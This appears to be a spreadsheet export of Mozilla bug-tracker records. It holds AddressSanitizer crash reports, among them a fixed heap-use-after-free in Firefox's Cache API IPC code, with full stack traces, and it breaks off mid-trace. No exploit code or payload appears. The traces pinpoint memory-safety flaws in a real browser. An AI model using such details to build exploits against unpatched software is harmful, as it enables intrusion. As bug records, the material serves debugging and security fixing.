SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3 in __asan_memcpy
Shadow bytes around the buggy address:
  0x0c0c80048700: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c0c80048710: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
  0x0c0c80048720: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c0c80048730: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c0c80048740: 00 00 00 00 00 00 00 00 fa fa fa fa fd fd fd fd
=&gt;0x0c0c80048750: fd fd fd fd fa fa fa fa 00 00 00 00 00 00[04]fa
  0x0c0c80048760: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c0c80048770: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd
  0x0c0c80048780: fd fd fd fd fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c80048790: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa
  0x0c0c800487a0: fd fd fd fd fd fd fd fd fa fa fa fa 00 00 00 00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29577==ABORTING</t>
        </is>
      </c>
      <c r="X1545" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1546">
      <c r="A1546" t="n">
        <v>1626728</v>
      </c>
      <c r="B1546" t="inlineStr">
        <is>
          <t>2020-04-01 12:38:09 -0700</t>
        </is>
      </c>
      <c r="C1546" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-use-after-free /home/fuzzer/firefox/src/dist/include/mozilla/ipc/ProtocolUtils.h:229:31 in Id</t>
        </is>
      </c>
      <c r="D1546" t="inlineStr">
        <is>
          <t>2024-05-30 10:13:12 -0700</t>
        </is>
      </c>
      <c r="E1546" t="n">
        <v>1</v>
      </c>
      <c r="F1546" t="n">
        <v>1</v>
      </c>
      <c r="G1546" t="n">
        <v>3</v>
      </c>
      <c r="H1546" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1546" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1546" t="inlineStr">
        <is>
          <t>Storage: Cache API</t>
        </is>
      </c>
      <c r="K1546" t="inlineStr">
        <is>
          <t>75 Branch</t>
        </is>
      </c>
      <c r="L1546" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1546" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1546" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1546" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1546" t="inlineStr"/>
      <c r="Q1546" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1546" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1546" t="inlineStr">
        <is>
          <t>mozilla76</t>
        </is>
      </c>
      <c r="T1546" t="n">
        <v>1</v>
      </c>
      <c r="U1546" t="n">
        <v>0</v>
      </c>
      <c r="V1546" t="n">
        <v>21</v>
      </c>
      <c r="W1546" t="inlineStr">
        <is>
          <t>Created attachment 9137563
75.0b8-ff.log
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Steps to reproduce:
Reproduced in 75.0b8 firefox
After the last advisory I thought that this had been fixed in Firefox 74, Bug 1610880 CVE-2020-6805 . It's related? or am I missing something.
Actual results:
```
=================================================================
==7841==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080006452a8 at pc 0x7f1255bf90b0 bp 0x7f11c984d690 sp 0x7f11c984d688 READ of size 4 at 0x6080006452a8 thread T24 (IPDL Background)
  #0 0x7f1255bf90af in Id /home/fuzzer/firefox/src/dist/include/mozilla/ipc/ProtocolUtils.h:229:31
  #1 0x7f1255bf90af in mozilla::dom::cache::PCacheStreamControlParent::SendCloseAll() /home/fuzzer/firefox/src/ipc/ipdl/PCacheStreamControlParent.cpp:75:61
  #2 0x7f1259f86832 in mozilla::dom::cache::Context::CancelAll() /home/fuzzer/firefox/checkout/dom/cache/Context.cpp:820:23
  #3 0x7f1259fbd3ed in Abort /home/fuzzer/firefox/checkout/dom/cache/Manager.cpp:1930:12
  #4 0x7f1259fbd3ed in mozilla::dom::cache::Manager::Factory::Abort(nsTSubstring&lt;char&gt; const&amp;) /home/fuzzer/firefox/checkout/dom/cache/Manager.cpp:292:20
  #5 0x7f125b893b2c in mozilla::dom::quota::QuotaManager::OpenDirectoryInternal(mozilla::dom::Nullable&lt;mozilla::dom::quota::PersistenceType&gt; const&amp;, mozilla::dom::quota::OriginScope const&amp;, mozilla::dom::Nullable&lt;mozilla::dom::quota::Client::Type&gt; const&amp;, bool, mozilla::dom::quota::OpenDirectoryListener*) /home/fuzzer/firefox/checkout/dom/quota/ActorsParent.cpp:6756:25
  #6 0x7f125b8ba0e5 in mozilla::dom::quota::(anonymous namespace)::NormalOriginOperationBase::Open() /home/fuzzer/firefox/checkout/dom/quota/ActorsParent.cpp:8392:30
  #7 0x7f125b8b9a77 in mozilla::dom::quota::(anonymous namespace)::OriginOperationBase::Run() /home/fuzzer/firefox/checkout/dom/quota/ActorsParent.cpp
  #8 0x7f125b8c35a7 in RunImmediately /home/fuzzer/firefox/checkout/dom/quota/ActorsParent.cpp:1262:5
  #9 0x7f125b8c35a7 in mozilla::dom::quota::(anonymous namespace)::Quota::RecvPQuotaRequestConstructor(mozilla::dom::quota::PQuotaRequestParent*, mozilla::dom::quota::RequestParams const&amp;) /home/fuzzer/firefox/checkout/dom/quota/ActorsParent.cpp:8841:7
  #10 0x7f1255712cd6 in mozilla::dom::quota::PQuotaParent::OnMessageReceived(IPC::Message const&amp;) /home/fuzzer/firefox/src/ipc/ipdl/PQuotaParent.cpp:350:28
  #11 0x7f1255ab6306 in mozilla::ipc::PBackgroundParent::OnMessageReceived(IPC::Message const&amp;) /home/fuzzer/firefox/src/ipc/ipdl/PBackgroundParent.cpp:3599:32
  #12 0x7f1254f62281 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /home/fuzzer/firefox/checkout/ipc/glue/MessageChannel.cpp:2187:25
  #13 0x7f1254f5e9b1 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/fuzzer/firefox/checkout/ipc/glue/MessageChannel.cpp:2111:9
  #14 0x7f1254f6067a in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/fuzzer/firefox/checkout/ipc/glue/MessageChannel.cpp:1959:3
  #15 0x7f1254f60ff7 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/fuzzer/firefox/checkout/ipc/glue/MessageChannel.cpp:1990:13
  #16 0x7f1253d15d00 in nsThread::ProcessNextEvent(bool, bool*) /home/fuzzer/firefox/checkout/xpcom/threads/nsThread.cpp:1220:14
  #17 0x7f1253d1e981 in NS_ProcessNextEvent(nsIThread*, bool) /home/fuzzer/firefox/checkout/xpcom/threads/nsThreadUtils.cpp:481:10
  #18 0x7f1254f6c2d5 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/fuzzer/firefox/checkout/ipc/glue/MessagePump.cpp:302:20
  #19 0x7f1254e7c322 in RunInternal /home/fuzzer/firefox/checkout/ipc/chromium/src/base/message_loop.cc:315:10
  #20 0x7f1254e7c322 in RunHandler /home/fuzzer/firefox/checkout/ipc/chromium/src/base/message_loop.cc:308:3
  #21 0x7f1254e7c322 in MessageLoop::Run() /home/fuzzer/firefox/checkout/ipc/chromium/src/base/message_loop.cc:290:3
  #22 0x7f1253d10531 in nsThread::ThreadFunc(void*) /home/fuzzer/firefox/checkout/xpcom/threads/nsThread.cpp:464:10
  #23 0x7f126ae772e8 in _pt_root /home/fuzzer/firefox/checkout/nsprpub/pr/src/pthreads/ptthread.c:201:5
  #24 0x7f126e78d668 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x9668)
  #25 0x7f126e34b322 in clone /build/glibc-t7JzpG/glibc-2.30/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95
0x6080006452a8 is located 8 bytes inside of 96-byte region [0x6080006452a0,0x608000645300)
freed by thread T24 (IPDL Background) here:
  #0 0x55fd68bddc7d in free (/home/fuzzer/firefox/src/dist/bin/firefox+0xbbc7d)
  #1 0x7f1254ed7c23 in mozilla::ipc::BackgroundParentImpl::DeallocPCacheStreamControlParent(mozilla::dom::cache::PCacheStreamControlParent*) /home/fuzzer/firefox/checkout/ipc/glue/BackgroundParentImpl.cpp:993:3
  #2 0x7f1254f82913 in mozilla::ipc::ActorLifecycleProxy::~ActorLifecycleProxy() /home/fuzzer/firefox/checkout/ipc/glue/ProtocolUtils.cpp:249:11
  #3 0x7f1255ab33dc in mozilla::ipc::PBackgroundParent::RemoveManagee(int, mozilla::ipc::IProtocol*) /home/fuzzer/firefox/src/ipc/ipdl/PBackgroundParent.cpp
  #4 0x7f1255bf9634 in mozilla::dom::cache::PCacheStreamControlParent::Send__delete__(mozilla::dom::cache::PCacheStreamControlParent*) /home/fuzzer/firefox/src/ipc/ipdl/PCacheStreamControlParent.cpp:125:10
  #5 0x7f1259fc7e43 in NoteClosed /home/fuzzer/firefox/checkout/dom/cache/StreamControl.cpp:29:3
  #6 0x7f1259fc7e43 in NoteClosedOnOwningThread /home/fuzzer/firefox/checkout/dom/cache/ReadStream.cpp:399:13
  #7 0x7f1259fc7e43 in mozilla::dom::cache::ReadStream::Inner::NoteClosed() /home/fuzzer/firefox/checkout/dom/cache/ReadStream.cpp:363:5
  #8 0x7f1259fcab60 in mozilla::dom::cache::StreamControl::CloseAllReadStreams() /home/fuzzer/firefox/checkout/dom/cache/StreamControl.cpp:68:21
  #9 0x7f1259f80de1 in NotifyCloseAll /home/fuzzer/firefox/checkout/dom/cache/CacheStreamControlParent.cpp:163:3
  #10 0x7f1259f80de1 in mozilla::dom::cache::CacheStreamControlParent::CloseAll() /home/fuzzer/firefox/checkout/dom/cache/CacheStreamControlParent.cpp:143:3
  #11 0x7f1259f86832 in mozilla::dom::cache::Context::CancelAll() /home/fuzzer/firefox/checkout/dom/cache/Context.cpp:820:23
  #12 0x7f1259fbd3ed in Abort /home/fuzzer/firefox/checkout/dom/cache/Manager.cpp:1930:12
  #13 0x7f1259fbd3ed in mozilla::dom::cache::Manager::Factory::Abort(nsTSubstring&lt;char&gt; const&amp;) /home/fuzzer/firefox/checkout/dom/cache/Manager.cpp:292:20
  #14 0x7f125b893b2c in mozilla::dom::quota::QuotaManager::OpenDirectoryInternal(mozilla::dom::Nullable&lt;mozilla::dom::quota::PersistenceType&gt; const&amp;, mozilla::dom::quota::OriginScope const&amp;, mozilla::dom::Nullable&lt;mozilla::dom::quota::Client::Type&gt; const&amp;, bool, mozilla::dom::quota::OpenDirectoryListener*) /home/fuzzer/firefox/checkout/dom/quota/ActorsParent.cpp:6756:25
  #15 0x7f125b8ba0e5 in mozilla::dom::quota::(anonymous namespace)::NormalOriginOperationBase::Open() /home/fuzzer/firefox/checkout/dom/quota/ActorsParent.cpp:8392:30
  #16 0x7f125b8b9a77 in mozilla::dom::quota::(anonymous namespace)::OriginOperationBase::Run() /home/fuzzer/firefox/checkout/dom/quota/ActorsParent.cpp
  #17 0x7f125b8c35a7 in RunImmediately /home/fuzzer/firefox/checkout/dom/quota/ActorsParent.cpp:1262:5
  #18 0x7f125b8c35a7 in mozilla::dom::quota::(anonymous namespace)::Quota::RecvPQuotaRequestConstructor(mozilla::dom::quota::PQuotaRequestParent*, mozilla::dom::quota::RequestParams const&amp;) /home/fuzzer/firefox/checkout/dom/quota/ActorsParent.cpp:8841:7
  #19 0x7f1255712cd6 in mozilla::dom::quota::PQuotaParent::OnMessageReceived(IPC::Message const&amp;) /home/fuzzer/firefox/src/ipc/ipdl/PQuotaParent.cpp:350:28
  #20 0x7f1255ab6306 in mozilla::ipc::PBackgroundParent::OnMessageReceived(IPC::Message const&amp;) /home/fuzzer/firefox/src/ipc/ipdl/PBackgroundParent.cpp:3599:32
  #21 0x7f1254f62281 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /home/fuzzer/firefox/checkout/ipc/glue/MessageChannel.cpp:2187:25
  #22 0x7f1254f5e9b1 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/fuzzer/firefox/checkout/ipc/glue/MessageChannel.cpp:2111:9
  #23 0x7f1254f6067a in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/fuzzer/firefox/checkout/ipc/glue/MessageChannel.cpp:1959:3
  #24 0x7f1254f60ff7 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/fuzzer/firefox/checkout/ipc/glue/MessageChannel.cpp:1990:13
  #25 0x7f1253d15d00 in nsThread::ProcessNextEvent(bool, bool*) /home/fuzzer/firefox/checkout/xpcom/threads/nsThread.cpp:1220:14
  #26 0x7f1253d1e981 in NS_ProcessNextEvent(nsIThread*, bool) /home/fuzzer/firefox/checkout/xpcom/threads/nsThreadUtils.cpp:481:10
  #27 0x7f1254f6c2d5 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/fuzzer/firefox/checkout/ipc/glue/MessagePump.cpp:302:20
  #28 0x7f1254e7c322 in RunInternal /home/fuzzer/firefox/checkout/ipc/chromium/src/base/message_loop.cc:315:10
  #29 0x7f1254e7c322 in RunHandler /home/fuzzer/firefox/checkout/ipc/chromium/src/base/message_loop.cc:308:3
  #30 0x7f1254e7c322 in MessageLoop::Run() /home/fuzzer/firefox/checkout/ipc/chromium/src/base/message_loop.cc:290:3
  #31 0x7f1253d10531 in nsThread::ThreadFunc(void*) /home/fuzzer/firefox/checkout/xpcom/threads/nsThread.cpp:464:10
  #32 0x7f126ae772e8 in _pt_root /home/fuzzer/firefox/checkout/nsprpub/pr/src/pthreads/ptthread.c:201:5
  #33 0x7f126e78d668 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x9668)
previously allocated by thread T24 (IPDL Background) here:
  #0 0x55fd68bddefd in malloc (/home/fuzzer/firefox/src/dist/bin/firefox+0xbbefd)
  #1 0x55fd68c134cd in moz_xmalloc /home/fuzzer/firefox/checkout/memory/mozalloc/mozalloc.cpp:52:15
  #2 0x7f1259f65f00 in operator new /home/fuzzer/firefox/src/dist/include/mozilla/cxxalloc.h:33:10
  #3 0x7f1259f65f00 in mozilla::dom::cache::AutoParentOpResult::SerializeReadStream(nsID const&amp;, mozilla::dom::cache::StreamList*, mozilla::dom::cache::CacheReadStream*) /home/fuzzer/firefox/checkout/dom/cache/AutoUtils.cpp:497:13
  #4 0x7f1259f652eb in mozilla::dom::cache::AutoParentOpResult::SerializeResponseBody(mozilla::dom::cache::SavedResponse const&amp;, mozilla::dom::cache::StreamList*, mozilla::dom::cache::CacheResponse*) /home/fuzzer/firefox/checkout/dom/cache/AutoUtils.cpp:481:3
  #5 0x7f1259f75d20 in mozilla::dom::cache::CacheOpParent::OnOpComplete(mozilla::ErrorResult&amp;&amp;, mozilla::dom::cache::CacheOpResult const&amp;, long, nsTArray&lt;mozilla::dom::cache::SavedResponse&gt; const&amp;, nsTArray&lt;mozilla::dom::cache::SavedRequest&gt; const&amp;, mozilla::dom::cache::StreamList*) /home/fuzzer/firefox/checkout/dom/cache/CacheOpParent.cpp:174:12
  #6 0x7f1259fbb7f3 in mozilla::dom::cache::Manager::Listener::OnOpComplete(mozilla::ErrorResult&amp;&amp;, mozilla::dom::cache::CacheOpResult const&amp;, mozilla::dom::cache::SavedResponse const&amp;, mozilla::dom::cache::StreamList*) /home/fuzzer/firefox/checkout/dom/cache/Manager.cpp:1497:3
  #7 0x7f1259fd988b in mozilla::dom::cache::Manager::CacheMatchAction::Complete(mozilla::dom::cache::Manager::Listener*, mozilla::ErrorResult&amp;&amp;) /home/fuzzer/firefox/checkout/dom/cache/Manager.cpp:557:18
  #8 0x7f1259fd8e12 in mozilla::dom::cache::Manager::BaseAction::CompleteOnInitiatingThread(nsresult) /home/fuzzer/firefox/checkout/dom/cache/Manager.cpp:436:7
  #9 0x7f1259f84c81 in mozilla::dom::cache::Context::ActionRunnable::Run() /home/fuzzer/firefox/checkout/dom/cache/Context.cpp:651:16
  #10 0x7f1253d15d00 in nsThread::ProcessNextEvent(bool, bool*) /home/fuzzer/firefox/checkout/xpcom/threads/nsThread.cpp:1220:14
  #11 0x7f1253d1e981 in NS_ProcessNextEvent(nsIThread*, bool) /home/fuzzer/firefox/checkout/xpcom/threads/nsThreadUtils.cpp:481:10
  #12 0x7f1254f6c2cb in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/fuzzer/firefox/checkout/ipc/glue/MessagePump.cpp:332:5
  #13 0x7f1254e7c322 in RunInternal /home/fuzzer/firefox/checkout/ipc/chromium/src/base/message_loop.cc:315:10
  #14 0x7f1254e7c322 in RunHandler /home/fuzzer/firefox/checkout/ipc/chromium/src/base/message_loop.cc:308:3
  #15 0x7f1254e7c322 in MessageLoop::Run() /home/fuzzer/firefox/checkout/ipc/chromium/src/base/message_loop.cc:290:3
  #16 0x7f1253d10531 in nsThread::ThreadFunc(void*) /home/fuzzer/firefox/checkout/xpcom/threads/nsThread.cpp:464:10
  #17 0x7f126ae772e8 in _pt_root /home/fuzzer/firefox/checkout/nsprpub/pr/src/pthreads/ptthread.c:201:5
  #18 0x7f126e78d668 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x9668)
Thread T24 (IPDL Background) created by T0 here:
  #0 0x55fd68bc868a in pthread_create (/home/fuzzer/firefox/src/dist/bin/firefox+0xa668a)
  #1 0x7f126ae656d3 in _PR_CreateThread /home/fuzzer/firefox/checkout/nsprpub/pr/src/pthreads/ptthread.c:458:14
  #2 0x7f126ae4f70e in PR_CreateThread /home/fuzzer/firefox/checkout/nsprpub/pr/src/pthreads/ptthread.c:533:12
  #3 0x7f1253d12832 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /home/fuzzer/firefox/checkout/xpcom/threads/nsThread.cpp:670:8
  #4 0x7f1253d1db7c in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /home/fuzzer/firefox/checkout/xpcom/threads/nsThreadManager.cpp:621:12
  #5 0x7f1253d21383 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, nsIRunnable*, unsigned int) /home/fuzzer/firefox/checkout/xpcom/threads/nsThreadUtils.cpp:139:57
  #6 0x7f1254f11b60 in NS_NewNamedThread&lt;16&gt; /home/fuzzer/firefox/src/dist/include/nsThreadUtils.h:65:10
  #7 0x7f1254f11b60 in (anonymous namespace)::ParentImpl::CreateBackgroundThread() /home/fuzzer/firefox/checkout/ipc/glue/BackgroundImpl.cpp:1325:7
  #8 0x7f1254f16080 in RunOnMainThread /home/fuzzer/firefox/checkout/ipc/glue/BackgroundImpl.cpp:1620:30
  #9 0x7f1254f16080 in (anonymous namespace)::ParentImpl::CreateActorHelper::Run() /home/fuzzer/firefox/checkout/ipc/glue/BackgroundImpl.cpp:1639:17
  #10 0x7f1253d15d00 in nsThread::ProcessNextEvent(bool, bool*) /home/fuzzer/firefox/checkout/xpcom/threads/nsThread.cpp:1220:14
  #11 0x7f1253d1e981 in NS_ProcessNextEvent(nsIThread*, bool) /home/fuzzer/firefox/checkout/xpcom/threads/nsThreadUtils.cpp:481:10
  #12 0x7f1253d1e25c in SpinEventLoopUntil&lt;mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /home/fuzzer/firefox/checkout/xpcom/threads/nsThreadManager.cpp:694:36)&gt; /home/fuzzer/firefox/src/dist/include/nsThreadUtils.h:342:25
  #13 0x7f1253d1e25c in nsThreadManager::SpinEventLoopUntilInternal(nsINestedEventLoopCondition*, bool) /home/fuzzer/firefox/checkout/xpcom/threads/nsThreadManager.cpp:694:8
  #14 0x7f1253d4b361 in NS_InvokeByIndex /home/fuzzer/firefox/checkout/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:106
  #15 0x7f1255df1c28 in Invoke /home/fuzzer/firefox/checkout/js/xpconnect/src/XPCWrappedNative.cpp:1634:10
  #16 0x7f1255df1c28 in Call /home/fuzzer/firefox/checkout/js/xpconnect/src/XPCWrappedNative.cpp:1175:19
  #17 0x7f1255df1c28 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/fuzzer/firefox/checkout/js/xpconnect/src/XPCWrappedNative.cpp:1141:23
  #18 0x7f1255df7d81 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/fuzzer/firefox/checkout/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:947:10
  #19 0x7f1260a4740c in CallJSNative /home/fuzzer/firefox/checkout/js/src/vm/Interpreter.cpp:477:13
  #20 0x7f1260a4740c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /home/fuzzer/firefox/checkout/js/src/vm/Interpreter.cpp:569:12
  #21 0x7f1260a30e07 in CallFromStack /home/fuzzer/firefox/checkout/js/src/vm/Interpreter.cpp:636:10
  #22 0x7f1260a30e07 in Interpret(JSContext*, js::RunState&amp;) /home/fuzzer/firefox/checkout/js/src/vm/Interpreter.cpp:3046:16
  #23 0x7f1260a15278 in js::RunScript(JSContext*, js::RunState&amp;) /home/fuzzer/firefox/checkout/js/src/vm/Interpreter.cpp:449:10
  #24 0x7f1260a47c8e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /home/fuzzer/firefox/checkout/js/src/vm/Interpreter.cpp:604:13
  #25 0x7f1260a49809 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /home/fuzzer/firefox/checkout/js/src/vm/Interpreter.cpp:649:8
  #26 0x7f1260fcf438 in js::fun_apply(JSContext*, unsigned int, JS::Value*) /home/fuzzer/firefox/checkout/js/src/vm/JSFunction.cpp:1214:10
  #27 0x7f1260a4740c in CallJSNative /home/fuzzer/firefox/checkout/js/src/vm/Interpreter.cpp:477:13
  #28 0x7f1260a4740c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /home/fuzzer/firefox/checkout/js/src/vm/Interpreter.cpp:569:12
  #29 0x7f1260a30e07 in CallFromStack /home/fuzzer/firefox/checkout/js/src/vm/Interpreter.cpp:636:10
  #30 0x7f1260a30e07 in Interpret(JSContext*, js::RunState&amp;) /home/fuzzer/firefox/checkout/js/src/vm/Interpreter.cpp:3046:16
  #31 0x7f1260a15278 in js::RunScript(JSContext*, js::RunState&amp;) /home/fuzzer/firefox/checkout/js/src/vm/Interpreter.cpp:449:10
  #32 0x7f1260a47c8e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /home/fuzzer/firefox/checkout/js/src/vm/Interpreter.cpp:604:13
  #33 0x7f1260a49809 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /home/fuzzer/firefox/checkout/js/src/vm/Interpreter.cpp:649:8
  #34 0x7f1260c03e30 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/fuzzer/firefox/checkout/js/src/jsapi.cpp:2735:10
  #35 0x7f1255de2499 in nsXPCWrappedJS::CallMethod(unsigned short, nsXPTMethodInfo const*, nsXPTCMiniVariant*) /home/fuzzer/firefox/checkout/js/xpconnect/src/XPCWrappedJSClass.cpp:959:17
  #36 0x7f1253d4c9f1 in PrepareAndDispatch /home/fuzzer/firefox/checkout/xpcom/reflect/xptcall/md/unix/xptcstubs_x86_64_linux.cpp:125:37
  #37 0x7f1253d4b8fa in SharedStub (/home/fuzzer/firefox/src/dist/bin/libxul.so+0x2cca8fa)
  #38 0x7f12607cbd27 in nsXREDirProvider::DoStartup() /home/fuzzer/firefox/checkout/toolkit/xre/nsXREDirProvider.cpp:957:11
  #39 0x7f12607ad0e7 in XREMain::XRE_mainRun() /home/fuzzer/firefox/checkout/toolkit/xre/nsAppRunner.cpp:4348:16
  #40 0x7f12607afa0b in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /home/fuzzer/firefox/checkout/toolkit/xre/nsAppRunner.cpp:4690:8
  #41 0x7f12607b0920 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /home/fuzzer/firefox/checkout/toolkit/xre/nsAppRunner.cpp:4741:21
  #42 0x55fd68c109ab in do_main /home/fuzzer/firefox/checkout/browser/app/nsBrowserApp.cpp:217:22
  #43 0x55fd68c109ab in main /home/fuzzer/firefox/checkout/browser/app/nsBrowserApp.cpp:331:16
  #44 0x7f126e2501e2 in __libc_start_main /build/glibc-t7JzpG/glibc-2.30/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-use-after-free /home/fuzzer/firefox/src/dist/include/mozilla/ipc/ProtocolUtils.h:229:31 in Id
Shadow bytes around the buggy address:
0x0c10800c0a00: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c10800c0a10: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x0c10800c0a20: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x0c10800c0a30: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c10800c0a40: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
=&gt;0x0c10800c0a50: fa fa fa fa fd[fd]fd fd fd fd fd fd fd fd fd fd
0x0c10800c0a60: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x0c10800c0a70: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c10800c0a80: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x0c10800c0a90: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x0c10800c0aa0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00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7841==ABORTING
```
Firefox 73b (old crash)
```
==============================================================
==7356==ERROR: AddressSanitizer: heap-use-after-free on address 0x60800081a3a8 at pc 0x7fa5dcb48b30 bp 0x7fa5d1d2a950 sp 0x7fa5d1d2a948
READ of size 4 at 0x60800081a3a8 thread T23 (IPDL Background)
    #0 0x7fa5dcb48b2f in Id /home/fuzzer/dev/firefox/dist/include/mozilla/ipc/ProtocolUtils.h:230:31
    #1 0x7fa5dcb48b2f in mozilla::dom::cache::PCacheStreamControlParent::SendCloseAll() /home/fuzzer/dev/firefox/ipc/ipdl/PCacheStreamControlParent.cpp:75:61
    #2 0x7fa5e0be61f2 in mozilla::dom::cache::Context::CancelAll() /home/fuzzer/dev/src/dom/cache/Context.cpp:819:23
    #3 0x7fa5e0c1c78d in Abort /home/fuzzer/dev/src/dom/cache/Manager.cpp:1930:12
    #4 0x7fa5e0c1c78d in mozilla::dom::cache::Manager::Factory::Abort(nsTSubstring&lt;char&gt; const&amp;) /home/fuzzer/dev/src/dom/cache/Manager.cpp:292:20
    #5 0x7fa5e236f38c in mozilla::dom::quota::QuotaManager::OpenDirectoryInternal(mozilla::dom::Nullable&lt;mozilla::dom::quota::PersistenceType&gt; const&amp;, mozilla::dom::quota::OriginScope const&amp;, mozilla::dom::Nullable&lt;mozilla::dom::quota::Client::Type&gt; const&amp;, bool, mozilla::dom::quota::OpenDirectoryListener*) /home/fuzzer/dev/src/dom/quota/ActorsParent.cpp:6705:25
    #6 0x7fa5e2393047 in mozilla::dom::quota::(anonymous namespace)::OriginOperationBase::Run() /home/fuzzer/dev/src/dom/quota/ActorsParent.cpp
    #7 0x7fa5e239c251 in RunImmediately /home/fuzzer/dev/src/dom/quota/ActorsParent.cpp:1260:5
    #8 0x7fa5e239c251 in mozilla::dom::quota::(anonymous namespace)::Quota::RecvPQuotaRequestConstructor(mozilla::dom::quota::PQuotaRequestParent*, mozilla::dom::quota::RequestParams const&amp;) /home/fuzzer/dev/src/dom/quota/ActorsParent.cpp:8765:7
    #9 0x7fa5dc788d12 in mozilla::dom::quota::PQuotaParent::OnMessageReceived(IPC::Message const&amp;) /home/fuzzer/dev/firefox/ipc/ipdl/PQuotaParent.cpp:350:28
    #10 0x7fa5dca4bb21 in mozilla::ipc::PBackgroundParent::OnMessageReceived(IPC::Message const&amp;) /home/fuzzer/dev/firefox/ipc/ipdl/PBackgroundParent.cpp:3522:32
    #11 0x7fa5dc198c26 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /home/fuzzer/dev/src/ipc/glue/MessageChannel.cpp:2215:25
    #12 0x7fa5dc195413 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/fuzzer/dev/src/ipc/glue/MessageChannel.cpp:2137:9
    #13 0x7fa5dc196cd9 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/fuzzer/dev/src/ipc/glue/MessageChannel.cpp:1976:3
